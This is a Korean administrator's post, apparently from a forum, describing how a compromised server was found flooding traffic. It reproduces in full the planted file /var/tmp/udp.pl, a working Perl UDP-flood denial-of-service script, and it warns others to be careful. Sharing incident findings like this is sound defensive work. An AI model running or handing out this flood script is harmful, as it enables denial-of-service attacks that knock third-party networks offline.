/var/tmp/udp.pl

구정 전날인 오늘 아침에 갑자기 인터넷이 안되기에 이것 저거 조취를 취하던 중

방화벽업체와 연락하여 우리쪽 서버중 한대에서 많은 양의 패킷을 송신하고 있다고 하여

조사하여 보니 udp 프로토콜로 계속 트래픽을 발생하고 있었습니다.

그래서 찾아보니 /var/tmp/udp.pl이란 파일이 생성되어 있고 여기에서 트래픽이 시작된거 같습니다.

파일의 내용은 이렇습니다.

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time> ";
 printf "if arg1/2 =0, randports/continous packets. ";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - Revenge ";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

여러분들도 조심하십시요....

인터넷검색해보니 프비도 뚫렸다고 합니다.

저두 소잃고 외양간 고치는 격으로 루트패스워드 부터 바꾸었습니다....